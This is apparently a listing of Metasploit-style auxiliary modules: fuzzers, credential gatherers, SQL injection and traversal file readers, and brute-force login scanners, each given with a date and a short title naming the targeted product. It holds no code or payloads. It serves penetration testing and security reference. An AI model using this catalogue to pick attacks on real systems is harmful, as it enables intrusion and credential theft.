fuzzers/http/http_get_uri_strings normal HTTP GET Request URI Fuzzer (Fuzzer Strings)
fuzzers/ntp/ntp_protocol_fuzzer normal NTP Protocol Fuzzer
fuzzers/smb/smb2_negotiate_corrupt normal SMB Negotiate SMB2 Dialect Corruption
fuzzers/smb/smb_create_pipe normal SMB Create Pipe Request Fuzzer
fuzzers/smb/smb_create_pipe_corrupt normal SMB Create Pipe Request Corruption
fuzzers/smb/smb_negotiate_corrupt normal SMB Negotiate Dialect Corruption
fuzzers/smb/smb_ntlm1_login_corrupt normal SMB NTLMv1 Login Request Corruption
fuzzers/smb/smb_tree_connect normal SMB Tree Connect Request Fuzzer
fuzzers/smb/smb_tree_connect_corrupt normal SMB Tree Connect Request Corruption
fuzzers/smtp/smtp_fuzzer normal SMTP Simple Fuzzer
fuzzers/ssh/ssh_kexinit_corrupt normal SSH Key Exchange Init Corruption
fuzzers/ssh/ssh_version_15 normal SSH 1.5 Version Fuzzer
fuzzers/ssh/ssh_version_2 normal SSH 2.0 Version Fuzzer
fuzzers/ssh/ssh_version_corrupt normal SSH Version Corruption
fuzzers/tds/tds_login_corrupt normal TDS Protocol Login Request Corruption Fuzzer
fuzzers/tds/tds_login_username normal TDS Protocol Login Request Username Fuzzer
gather/advantech_webaccess_creds 2017-01-21 normal Advantech WebAccess 8.1 Post Authentication Credential Collector
gather/alienvault_iso27001_sqli 2014-03-30 normal AlienVault Authenticated SQL Injection Arbitrary File Read
gather/alienvault_newpolicyform_sqli 2014-05-09 normal AlienVault Authenticated SQL Injection Arbitrary File Read
gather/android_browser_file_theft normal Android Browser File Theft
gather/android_browser_new_tab_cookie_theft normal Android Browser "Open in New Tab" Cookie Theft
gather/android_htmlfileprovider normal Android Content Provider File Disclosure
gather/android_object_tag_webview_uxss 2014-10-04 normal Android Open Source Platform (AOSP) Browser UXSS
gather/android_stock_browser_uxss normal Android Open Source Platform (AOSP) Browser UXSS
gather/apache_rave_creds normal Apache Rave User Information Disclosure
gather/apple_safari_ftp_url_cookie_theft 2015-04-08 normal Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft
gather/apple_safari_webarchive_uxss 2013-02-22 normal Mac OS X Safari .webarchive File Format UXSS
gather/asterisk_creds normal Asterisk Gather Credentials
gather/avtech744_dvr_accounts normal AVTECH 744 DVR Account Information Retrieval
gather/browser_info 2016-03-22 normal HTTP Client Information Gather
gather/censys_search normal Censys Search
gather/cerberus_helpdesk_hash_disclosure 2016-03-07 normal Cerberus Helpdesk User Hash Disclosure
gather/checkpoint_hostname 2011-12-14 normal CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure
gather/citrix_published_applications normal Citrix MetaFrame ICA Published Applications Scanner
gather/citrix_published_bruteforce normal Citrix MetaFrame ICA Published Applications Bruteforcer
gather/coldfusion_pwd_props 2013-05-07 normal ColdFusion 'password.properties' Hash Extraction
gather/corpwatch_lookup_id normal CorpWatch Company ID Information Search
gather/corpwatch_lookup_name normal CorpWatch Company Name Information Search
gather/d20pass 2012-01-19 normal General Electric D20 Password Recovery
gather/darkcomet_filedownloader 2012-10-08 normal DarkComet Server Remote File Download Exploit
gather/doliwamp_traversal_creds 2014-01-12 normal DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials
gather/drupal_openid_xxe 2012-10-17 normal Drupal OpenID External Entity Injection
gather/eaton_nsm_creds 2012-06-26 normal Network Shutdown Module sort_values Credential Dumper
gather/emc_cta_xxe 2014-03-31 normal EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read
gather/enum_dns normal DNS Record Scanner and Enumerator
gather/eventlog_cred_disclosure 2014-11-05 normal ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure
gather/external_ip normal Discover External IP via Ifconfig.me
gather/f5_bigip_cookie_disclosure normal F5 BigIP Backend Cookie Disclosure
gather/firefox_pdfjs_file_theft normal Firefox PDF.js Browser File Theft
gather/flash_rosetta_jsonp_url_disclosure 2014-07-08 normal Flash "Rosetta" JSONP GET/POST Response Disclosure
gather/hp_enum_perfd normal HP Operations Manager Perfd Environment Scanner
gather/hp_snac_domain_creds 2013-09-09 normal HP ProCurve SNAC Domain Controller Credential Dumper
gather/http_pdf_authors normal Gather PDF Authors
gather/huawei_wifi_info 2013-11-11 normal Huawei Datacard Information Disclosure Vulnerability
gather/ibm_sametime_enumerate_users 2013-12-27 normal IBM Lotus Notes Sametime User Enumeration
gather/ibm_sametime_room_brute 2013-12-27 normal IBM Lotus Notes Sametime Room Name Bruteforce
gather/ibm_sametime_version 2013-12-27 normal IBM Lotus Sametime Version Enumeration
gather/ie_sandbox_findfiles 2016-08-09 normal Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability
gather/ie_uxss_injection 2015-02-01 normal MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection
gather/impersonate_ssl normal HTTP SSL Certificate Impersonation
gather/java_rmi_registry normal Java RMI Registry Interfaces Enumeration
gather/jenkins_cred_recovery normal Jenkins Domain Credential Recovery
gather/joomla_com_realestatemanager_sqli 2015-10-22 normal Joomla Real Estate Manager Component Error-Based SQL Injection
gather/joomla_contenthistory_sqli 2015-10-22 normal Joomla com_contenthistory Error-Based SQL Injection
gather/joomla_weblinks_sqli 2014-03-02 normal Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read
gather/kerberos_enumusers normal Kerberos Domain User Enumeration
gather/konica_minolta_pwd_extract normal Konica Minolta Password Extractor
gather/lansweeper_collector normal Lansweeper Credential Collector
gather/mantisbt_admin_sqli 2014-02-28 normal MantisBT Admin SQL Injection Arbitrary File Read
gather/mcafee_epo_xxe 2015-01-06 normal McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure
gather/memcached_extractor normal Memcached Extractor
gather/mongodb_js_inject_collection_enum 2014-06-07 normal MongoDB NoSQL Collection Enumeration Via Injection
gather/ms14_052_xmldom 2014-09-09 normal MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure
gather/mybb_db_fingerprint 2014-02-13 normal MyBB Database Fingerprint
gather/natpmp_external_address normal NAT-PMP External Address Scanner
gather/netgear_password_disclosure normal NETGEAR Administrator Password Disclosure
gather/nis_bootparamd_domain normal NIS bootparamd Domain Name Disclosure
gather/nis_ypserv_map normal NIS ypserv Map Dumper
gather/opennms_xxe 2015-01-08 normal OpenNMS Authenticated XXE
gather/qnap_backtrace_admin_hash 2017-01-31 normal QNAP NAS/NVR Administrator Hash Disclosure
gather/safari_file_url_navigation 2014-01-16 normal Mac OS X Safari file:// Redirection Sandbox Escape
gather/samsung_browser_sop_bypass 2017-11-08 normal Samsung Internet Browser SOP Bypass
gather/search_email_collector normal Search Engine Domain Email Address Collector
gather/searchengine_subdomains_collector normal Search Engine Subdomains Collector
gather/shodan_honeyscore normal Shodan Honeyscore Client
gather/shodan_search normal Shodan Search
gather/snare_registry normal Snare Lite for Windows Registry Access
gather/solarwinds_orion_sqli 2015-02-24 normal Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation
gather/ssllabs_scan normal SSL Labs API Client
gather/teamtalk_creds normal TeamTalk Gather Credentials
gather/trackit_sql_domain_creds 2014-10-07 normal BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure
gather/vbulletin_vote_sqli 2013-03-24 normal vBulletin Password Collector via nodeid SQL Injection
gather/windows_deployment_services_shares normal Microsoft Windows Deployment Services Unattend Gatherer
gather/wp_all_in_one_migration_export 2015-03-19 normal WordPress All-in-One Migration Export
gather/wp_ultimate_csv_importer_user_extract 2015-02-02 normal WordPress Ultimate CSV Importer User Table Extract
gather/wp_w3_total_cache_hash_extract normal WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract
gather/xbmc_traversal 2012-11-04 normal XBMC Web Server Directory Traversal
gather/xerox_pwd_extract normal Xerox Administrator Console Password Extractor
gather/xerox_workcentre_5xxx_ldap normal Xerox Workcentre 5735 LDAP Service Redential Extractor
gather/zabbix_toggleids_sqli 2016-08-11 normal Zabbix toggle_ids SQL Injection
gather/zoomeye_search normal ZoomEye Search
parser/unattend normal Auxilliary Parser Windows Unattend Passwords
pdf/foxit/authbypass 2009-03-09 normal Foxit Reader Authorization Bypass
scanner/acpp/login normal Apple Airport ACPP Authentication Scanner
scanner/afp/afp_login normal Apple Filing Protocol Login Utility
scanner/afp/afp_server_info normal Apple Filing Protocol Info Enumerator
scanner/backdoor/energizer_duo_detect normal Energizer DUO Trojan Scanner
scanner/chargen/chargen_probe 1996-02-08 normal Chargen Probe Utility
scanner/couchdb/couchdb_enum normal CouchDB Enum Utility
scanner/couchdb/couchdb_login normal CouchDB Login Utility
scanner/db2/db2_auth normal DB2 Authentication Brute Force Utility
scanner/db2/db2_version normal DB2 Probe Utility
scanner/db2/discovery normal DB2 Discovery Service Detection
scanner/dcerpc/endpoint_mapper normal Endpoint Mapper Service Discovery
scanner/dcerpc/hidden normal Hidden DCERPC Service Discovery
scanner/dcerpc/management normal Remote Management Interface Discovery
scanner/dcerpc/tcp_dcerpc_auditor normal DCERPC TCP Service Auditor
scanner/dcerpc/windows_deployment_services normal Microsoft Windows Deployment Services Unattend Retrieval
scanner/dect/call_scanner normal DECT Call Scanner
scanner/dect/station_scanner normal DECT Base Station Scanner
scanner/discovery/arp_sweep normal ARP Sweep Local Network Discovery
scanner/discovery/empty_udp normal UDP Empty Prober
scanner/discovery/ipv6_multicast_ping normal IPv6 Link Local/Node Local Ping Discovery
scanner/discovery/ipv6_neighbor normal IPv6 Local Neighbor Discovery
scanner/discovery/ipv6_neighbor_router_advertisement normal IPv6 Local Neighbor Discovery Using Router Advertisement
scanner/discovery/udp_probe normal UDP Service Prober
scanner/discovery/udp_sweep normal UDP Service Sweeper
scanner/dlsw/dlsw_leak_capture 2014-11-17 normal Cisco DLSw Information Disclosure Scanner
scanner/dns/dns_amp normal DNS Amplification Scanner
scanner/elasticsearch/indices_enum normal ElasticSearch Indices Enumeration Utility
scanner/emc/alphastor_devicemanager normal EMC AlphaStor Device Manager Service
scanner/emc/alphastor_librarymanager normal EMC AlphaStor Library Manager Service
scanner/etcd/open_key_scanner normal Etcd Keys API Information Gathering
scanner/finger/finger_users normal Finger Service User Enumerator
scanner/ftp/anonymous normal Anonymous FTP Access Detection
scanner/ftp/bison_ftp_traversal 2015-09-28 normal BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
scanner/ftp/colorado_ftp_traversal 2016-08-11 normal ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure
scanner/ftp/easy_file_sharing_ftp 2017-03-07 normal Easy File Sharing FTP Server 3.6 Directory Traversal
scanner/ftp/ftp_login normal FTP Authentication Scanner
scanner/ftp/ftp_version normal FTP Version Scanner
scanner/ftp/konica_ftp_traversal 2015-09-22 normal Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure
scanner/ftp/pcman_ftp_traversal 2015-09-28 normal PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
scanner/ftp/titanftp_xcrc_traversal 2010-06-15 normal Titan FTP XCRC Directory Traversal Information Disclosure
scanner/gopher/gopher_gophermap normal Gopher gophermap Scanner
scanner/h323/h323_version normal H.323 Version Scanner
scanner/http/a10networks_ax_directory_traversal 2014-01-28 normal A10 Networks AX Loadbalancer Directory Traversal
scanner/http/accellion_fta_statecode_file_read 2015-07-10 normal Accellion FTA 'statecode' Cookie Arbitrary File Read
scanner/http/adobe_xml_inject normal Adobe XML External Entity Injection
scanner/http/advantech_webaccess_login normal Advantech WebAccess Login
scanner/http/allegro_rompager_misfortune_cookie 2014-12-17 normal Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Scanner
scanner/http/apache_activemq_source_disclosure normal Apache ActiveMQ JSP Files Source Disclosure
scanner/http/apache_activemq_traversal normal Apache ActiveMQ Directory Traversal
scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
scanner/http/apache_optionsbleed 2017-09-18 normal Apache Optionsbleed Scanner
scanner/http/apache_userdir_enum normal Apache "mod_userdir" User Enumeration
scanner/http/appletv_login normal AppleTV AirPlay Login Utility
scanner/http/atlassian_crowd_fileaccess normal Atlassian Crowd XML Entity Expansion Remote File Access
scanner/http/axis_local_file_include normal Apache Axis2 v1.4.1 Local File Inclusion
scanner/http/axis_login normal Apache Axis2 Brute Force Utility
scanner/http/backup_file normal HTTP Backup File Scanner
scanner/http/barracuda_directory_traversal 2010-10-08 normal Barracuda Multiple Product "locale" Directory Traversal
scanner/http/bavision_cam_login normal BAVision IP Camera Web Server Login
scanner/http/binom3_login_config_pass_dump normal Binom3 Web Management Login Scanner, Config and Password File Dump
scanner/http/bitweaver_overlay_type_traversal 2012-10-23 normal Bitweaver overlay_type Directory Traversal
scanner/http/blind_sql_query normal HTTP Blind SQL Injection Scanner
scanner/http/bmc_trackit_passwd_reset 2014-12-09 normal BMC TrackIt! Unauthenticated Arbitrary User Password Change
scanner/http/brute_dirs normal HTTP Directory Brute Force Scanner
scanner/http/buffalo_login normal Buffalo NAS Login Utility
scanner/http/buildmaster_login normal Inedo BuildMaster Login Scanner
scanner/http/caidao_bruteforce_login normal Chinese Caidao Backdoor Bruteforce
scanner/http/canon_wireless 2013-06-18 normal Canon Printer Wireless Configuration Disclosure
scanner/http/cert normal HTTP SSL Certificate Checker
scanner/http/chef_webui_login normal Chef Web UI Brute Force Utility
scanner/http/chromecast_webserver normal Chromecast Web Server Scanner
scanner/http/chromecast_wifi normal Chromecast Wifi Enumeration
scanner/http/cisco_asa_asdm normal Cisco ASA ASDM Bruteforce Login Utility
scanner/http/cisco_device_manager 2000-10-26 normal Cisco Device HTTP Device Manager Access
scanner/http/cisco_firepower_download 2016-10-10 normal Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal
scanner/http/cisco_firepower_login normal Cisco Firepower Management Console 6.0 Login
scanner/http/cisco_ios_auth_bypass 2001-06-27 normal Cisco IOS HTTP Unauthorized Administrative Access
scanner/http/cisco_ironport_enum normal Cisco Ironport Bruteforce Login Utility
scanner/http/cisco_nac_manager_traversal normal Cisco Network Access Manager Directory Traversal Vulnerability
scanner/http/cisco_ssl_vpn normal Cisco SSL VPN Bruteforce Login Utility
scanner/http/cisco_ssl_vpn_priv_esc 2014-04-09 normal Cisco ASA SSL VPN Privilege Escalation Vulnerability
scanner/http/clansphere_traversal 2012-10-23 normal ClanSphere 2011.3 Local File Inclusion Vulnerability
scanner/http/cnpilot_r_web_login_loot normal Cambium cnPilot r200/r201 Login Scanner and Config Dump
scanner/http/coldfusion_locale_traversal normal ColdFusion Server Check
scanner/http/coldfusion_version normal ColdFusion Version Scanner
scanner/http/concrete5_member_list normal Concrete5 Member List Enumeration
scanner/http/copy_of_file normal HTTP Copy File Scanner
scanner/http/crawler normal Web Site Crawler
scanner/http/dell_idrac normal Dell iDRAC Default Login
scanner/http/dir_listing normal HTTP Directory Listing Scanner
scanner/http/dir_scanner normal HTTP Directory Scanner
scanner/http/dir_webdav_unicode_bypass normal MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
scanner/http/directadmin_login normal DirectAdmin Web Control Panel Login Utility
scanner/http/dlink_dir_300_615_http_login normal D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility
scanner/http/dlink_dir_615h_http_login normal D-Link DIR-615H HTTP Login Utility
scanner/http/dlink_dir_session_cgi_http_login normal D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility
scanner/http/dlink_user_agent_backdoor 2013-10-12 normal D-Link User-Agent Backdoor Scanner
scanner/http/dnalims_file_retrieve 2017-03-08 normal DnaLIMS Directory Traversal
scanner/http/dolibarr_login normal Dolibarr ERP/CRM Login Utility
scanner/http/drupal_views_user_enum 2010-07-02 normal Drupal Views Module Users Enumeration
scanner/http/ektron_cms400net normal Ektron CMS400.NET Default Password Scanner
scanner/http/elasticsearch_traversal normal ElasticSearch Snapshot API Directory Traversal
scanner/http/enum_wayback normal Archive.org Stored Domain URLs
scanner/http/epmp1000_cmd_exec normal Cambium ePMP 1000 (up to v2.5) Arbitrary Command Execution
scanner/http/epmp1000_dump_config normal Cambium ePMP 1000 Dump Device Config
scanner/http/epmp1000_dump_hashes normal Cambium ePMP 1000 'ping' Password Hash Extractor (up to v2.5)
scanner/http/epmp1000_get_chart_cmd_exec normal Cambium ePMP 1000 'get_chart' Command Injection (v3.1-3.5-RC7)
scanner/http/epmp1000_ping_cmd_exec normal Cambium ePMP 1000 'ping' Command Injection (up to v2.5)
scanner/http/epmp1000_reset_pass normal Cambium ePMP 1000 Account Password Reset
scanner/http/epmp1000_web_login normal Cambium ePMP 1000 Login Scanner
scanner/http/error_sql_injection normal HTTP Error Based SQL Injection Scanner
scanner/http/etherpad_duo_login normal EtherPAD Duo Login Bruteforce Utility
scanner/http/f5_bigip_virtual_server normal F5 BigIP HTTP Virtual Server Scanner
scanner/http/f5_mgmt_scanner normal F5 Networks Devices Management Interface Scanner
scanner/http/file_same_name_dir normal HTTP File Same Name Directory Scanner
scanner/http/files_dir normal HTTP Interesting File Scanner
scanner/http/frontpage_login normal FrontPage Server Extensions Anonymous Login Scanner
scanner/http/gavazzi_em_login_loot normal Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database
scanner/http/git_scanner normal HTTP Git Scanner
scanner/http/gitlab_login normal GitLab Login Utility
scanner/http/gitlab_user_enum 2014-11-21 normal GitLab User Enumeration
scanner/http/glassfish_login normal GlassFish Brute Force Utility
scanner/http/goahead_traversal normal Embedthis GoAhead Embedded Web Server Directory Traversal
scanner/http/groupwise_agents_http_traversal normal Novell Groupwise Agents HTTP Directory Traversal
scanner/http/host_header_injection normal HTTP Host Header Injection Detection
scanner/http/hp_imc_bims_downloadservlet_traversal normal HP Intelligent Management BIMS DownloadServlet Directory Traversal
scanner/http/hp_imc_faultdownloadservlet_traversal normal HP Intelligent Management FaultDownloadServlet Directory Traversal
scanner/http/hp_imc_ictdownloadservlet_traversal normal HP Intelligent Management IctDownloadServlet Directory Traversal
scanner/http/hp_imc_reportimgservlt_traversal normal HP Intelligent Management ReportImgServlt Directory Traversal
scanner/http/hp_imc_som_file_download normal HP Intelligent Management SOM FileDownloadServlet Arbitrary Download
scanner/http/hp_sitescope_getfileinternal_fileaccess normal HP SiteScope SOAP Call getFileInternal Remote File Access
scanner/http/hp_sitescope_getsitescopeconfiguration normal HP SiteScope SOAP Call getSiteScopeConfiguration Configuration Access
scanner/http/hp_sitescope_loadfilecontent_fileaccess normal HP SiteScope SOAP Call loadFileContent Remote File Access
scanner/http/hp_sys_mgmt_login normal HP System Management Homepage Login Utility
scanner/http/http_header normal HTTP Header Detection
scanner/http/http_hsts normal HTTP Strict Transport Security (HSTS) Detection
scanner/http/http_login normal HTTP Login Utility
scanner/http/http_put normal HTTP Writable Path PUT/DELETE File Access
scanner/http/http_traversal normal Generic HTTP Directory Traversal Utility
scanner/http/http_version normal HTTP Version Detection
scanner/http/httpbl_lookup normal Http:BL Lookup
scanner/http/iis_internal_ip normal Microsoft IIS HTTP Internal IP Disclosure
scanner/http/influxdb_enum normal InfluxDB Enum Utility
scanner/http/infovista_enum normal InfoVista VistaPortal Application Bruteforce Login Utility
scanner/http/intel_amt_digest_bypass 2017-05-05 normal Intel AMT Digest Authentication Bypass Scanner
scanner/http/ipboard_login normal IP Board Login Auxiliary Module
scanner/http/jboss_status normal JBoss Status Servlet Information Gathering
scanner/http/jboss_vulnscan normal JBoss Vulnerability Scanner
scanner/http/jenkins_command normal Jenkins-CI Unauthenticated Script-Console Scanner
scanner/http/jenkins_enum normal Jenkins-CI Enumeration
scanner/http/jenkins_login normal Jenkins-CI Login Utility
scanner/http/joomla_bruteforce_login normal Joomla Bruteforce Login Utility
scanner/http/joomla_ecommercewd_sqli_scanner 2015-03-20 normal Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner
scanner/http/joomla_gallerywd_sqli_scanner 2015-03-30 normal Gallery WD for Joomla! Unauthenticated SQL Injection Scanner
scanner/http/joomla_pages normal Joomla Page Scanner
scanner/http/joomla_plugins normal Joomla Plugins Scanner
scanner/http/joomla_version normal Joomla Version Scanner
scanner/http/kodi_traversal 2017-02-12 normal Kodi 17.0 Local File Inclusion Vulnerability
scanner/http/linknat_vos_traversal normal Linknat Vos Manager Traversal
scanner/http/linksys_e1500_traversal normal Linksys E1500 Directory Traversal Vulnerability
scanner/http/litespeed_source_disclosure normal LiteSpeed Source Code Disclosure/Download
scanner/http/lucky_punch normal HTTP Microsoft SQL Injection Table XSS Infection
scanner/http/majordomo2_directory_traversal 2011-03-08 normal Majordomo2 _list_file_get() Directory Traversal
scanner/http/manageengine_desktop_central_login normal ManageEngine Desktop Central Login Utility
scanner/http/manageengine_deviceexpert_traversal 2012-03-18 normal ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal
scanner/http/manageengine_deviceexpert_user_creds 2014-08-28 normal ManageEngine DeviceExpert User Credentials
scanner/http/manageengine_securitymanager_traversal 2012-10-19 normal ManageEngine SecurityManager Plus 5.5 Directory Traversal
scanner/http/mediawiki_svg_fileaccess normal MediaWiki SVG XML Entity Expansion Remote File Access
scanner/http/meteocontrol_weblog_extractadmin normal Meteocontrol WEBlog Password Extractor
scanner/http/mod_negotiation_brute normal Apache HTTPD mod_negotiation Filename Bruter
scanner/http/mod_negotiation_scanner normal Apache HTTPD mod_negotiation Scanner
scanner/http/ms09_020_webdav_unicode_bypass normal MS09-020 IIS6 WebDAV Unicode Authentication Bypass
scanner/http/ms15_034_http_sys_memory_dump normal MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
scanner/http/mybook_live_login normal Western Digital MyBook Live Login Utility
scanner/http/netdecision_traversal 2012-03-07 normal NetDecision NOCVision Server Directory Traversal
scanner/http/netgear_sph200d_traversal normal Netgear SPH200D Directory Traversal Vulnerability
scanner/http/nginx_source_disclosure normal Nginx Source Code Disclosure/Download
scanner/http/novell_file_reporter_fsfui_fileaccess 2012-11-16 normal NFR Agent FSFUI Record Arbitrary Remote File Access
scanner/http/novell_file_reporter_srs_fileaccess 2012-11-16 normal NFR Agent SRS Record Arbitrary Remote File Access
scanner/http/novell_mdm_creds normal Novell Zenworks Mobile Device Managment Admin Credentials
scanner/http/ntlm_info_enumeration normal Host Information Enumeration via NTLM Authentication
scanner/http/octopusdeploy_login normal Octopus Deploy Login Utility
scanner/http/open_proxy normal HTTP Open Proxy Detection
scanner/http/openmind_messageos_login normal OpenMind Message-OS Portal Login Brute Force Utility
scanner/http/options normal HTTP Options Detection
scanner/http/oracle_demantra_database_credentials_leak 2014-02-28 normal Oracle Demantra Database Credentials Leak
scanner/http/oracle_demantra_file_retrieval 2014-02-28 normal Oracle Demantra Arbitrary File Retrieval with Authentication Bypass
scanner/http/oracle_ilom_login normal Oracle ILO Manager Login Brute Force Utility
scanner/http/owa_ews_login normal OWA Exchange Web Services (EWS) Login Scanner
scanner/http/owa_iis_internal_ip 2012-12-17 normal Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure
scanner/http/owa_login normal Outlook Web App (OWA) Brute Force Utility
scanner/http/pocketpad_login normal PocketPAD Login Bruteforce Force Utility
scanner/http/prev_dir_same_name_file normal HTTP Previous Directory File Scanner
scanner/http/radware_appdirector_enum normal Radware AppDirector Bruteforce Login Utility
scanner/http/rails_json_yaml_scanner normal Ruby on Rails JSON Processor YAML Deserialization Scanner
scanner/http/rails_mass_assignment normal Ruby On Rails Attributes Mass Assignment Scanner
scanner/http/rails_xml_yaml_scanner normal Ruby on Rails XML Processor YAML Deserialization Scanner
scanner/http/replace_ext normal HTTP File Extension Scanner
scanner/http/rewrite_proxy_bypass normal Apache Reverse Proxy Bypass Vulnerability Scanner
scanner/http/rfcode_reader_enum normal RFCode Reader Web Interface Login / Bruteforce Utility
scanner/http/rips_traversal normal RIPS Scanner Directory Traversal
scanner/http/riverbed_steelhead_vcx_file_read 2017-06-01 normal Riverbed SteelHead VCX File Read
scanner/http/robots_txt normal HTTP Robots.txt Content Scanner
scanner/http/s40_traversal 2011-04-07 normal S40 0.4.2 CMS Directory Traversal Vulnerability
scanner/http/sap_businessobjects_user_brute normal SAP BusinessObjects User Bruteforcer
scanner/http/sap_businessobjects_user_brute_web normal SAP BusinessObjects Web User Bruteforcer
scanner/http/sap_businessobjects_user_enum normal SAP BusinessObjects User Enumeration
scanner/http/sap_businessobjects_version_enum normal SAP BusinessObjects Version Detection
scanner/http/scraper normal HTTP Page Scraper
scanner/http/sentry_cdu_enum normal Sentry Switched CDU Bruteforce Login Utility
scanner/http/servicedesk_plus_traversal 2015-10-03 normal ManageEngine ServiceDesk Plus Path Traversal
scanner/http/sevone_enum 2013-06-07 normal SevOne Network Performance Management Application Brute Force Login Utility
scanner/http/simple_webserver_traversal 2013-01-03 normal Simple Web Server 2.3-RC1 Directory Traversal
scanner/http/smt_ipmi_49152_exposure 2014-06-19 normal Supermicro Onboard IPMI Port 49152 Sensitive File Exposure
scanner/http/smt_ipmi_cgi_scanner 2013-11-06 normal Supermicro Onboard IPMI CGI Vulnerability Scanner
scanner/http/smt_ipmi_static_cert_scanner 2013-11-06 normal Supermicro Onboard IPMI Static SSL Certificate Scanner
scanner/http/smt_ipmi_url_redirect_traversal 2013-11-06 normal Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal
scanner/http/soap_xml normal HTTP SOAP Verb/Noun Brute Force Scanner
scanner/http/sockso_traversal 2012-03-14 normal Sockso Music Host Server 1.5 Directory Traversal
scanner/http/splunk_web_login normal Splunk Web Interface Login Utility
scanner/http/squid_pivot_scanning normal Squid Proxy Port Scanner
scanner/http/squiz_matrix_user_enum 2011-11-08 normal Squiz Matrix User Enumeration Scanner
scanner/http/ssl normal HTTP SSL Certificate Information
scanner/http/ssl_version 2014-10-14 normal HTTP SSL/TLS Version Detection (POODLE scanner)
scanner/http/support_center_plus_directory_traversal 2014-01-28 normal ManageEngine Support Center Plus Directory Traversal
scanner/http/surgenews_user_creds 2017-06-16 normal SurgeNews User Credentials
scanner/http/svn_scanner normal HTTP Subversion Scanner
scanner/http/svn_wcdb_scanner normal SVN wc.db Scanner
scanner/http/sybase_easerver_traversal 2011-05-25 normal Sybase Easerver 6.3 Directory Traversal
scanner/http/symantec_brightmail_ldapcreds 2015-12-17 normal Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability
scanner/http/symantec_brightmail_logfile 2012-11-30 normal Symantec Messaging Gateway 9.5 Log File Download Vulnerability
scanner/http/symantec_web_gateway_login normal Symantec Web Gateway Login Utility
scanner/http/titan_ftp_admin_pwd normal Titan FTP Administrative Password Disclosure
scanner/http/title normal HTTP HTML Title Tag Content Grabber
scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
scanner/http/tplink_traversal_noauth normal TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability
scanner/http/trace normal HTTP Cross-Site Tracing Detection
scanner/http/trace_axd normal HTTP trace.axd Content Scanner
scanner/http/typo3_bruteforce normal Typo3 Login Bruteforcer
scanner/http/vcms_login normal V-CMS Login Utility
scanner/http/verb_auth_bypass normal HTTP Verb Authentication Bypass Scanner
scanner/http/vhost_scanner normal HTTP Virtual Host Brute Force Scanner
scanner/http/wangkongbao_traversal normal WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal
scanner/http/web_vulndb normal HTTP Vuln Scanner
scanner/http/webdav_internal_ip normal HTTP WebDAV Internal IP Scanner
scanner/http/webdav_scanner normal HTTP WebDAV Scanner
scanner/http/webdav_website_content normal HTTP WebDAV Website Content Scanner
scanner/http/webpagetest_traversal 2012-07-13 normal WebPageTest Directory Traversal
scanner/http/wildfly_traversal 2014-10-22 normal WildFly Directory Traversal
scanner/http/wordpress_content_injection 2017-02-01 normal WordPress REST API Content Injection
scanner/http/wordpress_cp_calendar_sqli 2015-03-03 normal WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner
scanner/http/wordpress_ghost_scanner normal WordPress XMLRPC GHOST Vulnerability Scanner
scanner/http/wordpress_login_enum normal WordPress Brute Force and User Enumeration Utility
scanner/http/wordpress_multicall_creds normal Wordpress XML-RPC system.multicall Credential Collector
scanner/http/wordpress_pingback_access normal Wordpress Pingback Locator
scanner/http/wordpress_scanner normal Wordpress Scanner
scanner/http/wordpress_xmlrpc_login normal Wordpress XML-RPC Username/Password Login Scanner
scanner/http/wp_contus_video_gallery_sqli 2015-02-24 normal WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner
scanner/http/wp_dukapress_file_read normal WordPress DukaPress Plugin File Read Vulnerability
scanner/http/wp_gimedia_library_file_read normal WordPress GI-Media Library Plugin Directory Traversal Vulnerability
scanner/http/wp_mobile_pack_info_disclosure normal WordPress Mobile Pack Information Disclosure Vulnerability
scanner/http/wp_mobileedition_file_read normal WordPress Mobile Edition File Read Vulnerability
scanner/http/wp_nextgen_galley_file_read normal WordPress NextGEN Gallery Directory Read Vulnerability
scanner/http/wp_simple_backup_file_read normal WordPress Simple Backup File Read Vulnerability
scanner/http/wp_subscribe_comments_file_read normal WordPress Subscribe Comments File Read Vulnerability
scanner/http/xpath normal HTTP Blind XPATH 1.0 Injector
scanner/http/yaws_traversal 2011-11-25 normal Yaws Web Server Directory Traversal
scanner/http/zabbix_login normal Zabbix Server Brute Force Utility
scanner/http/zenworks_assetmanagement_fileaccess normal Novell ZENworks Asset Management 7.5 Remote File Access
scanner/http/zenworks_assetmanagement_getconfig normal Novell ZENworks Asset Management 7.5 Configuration Access
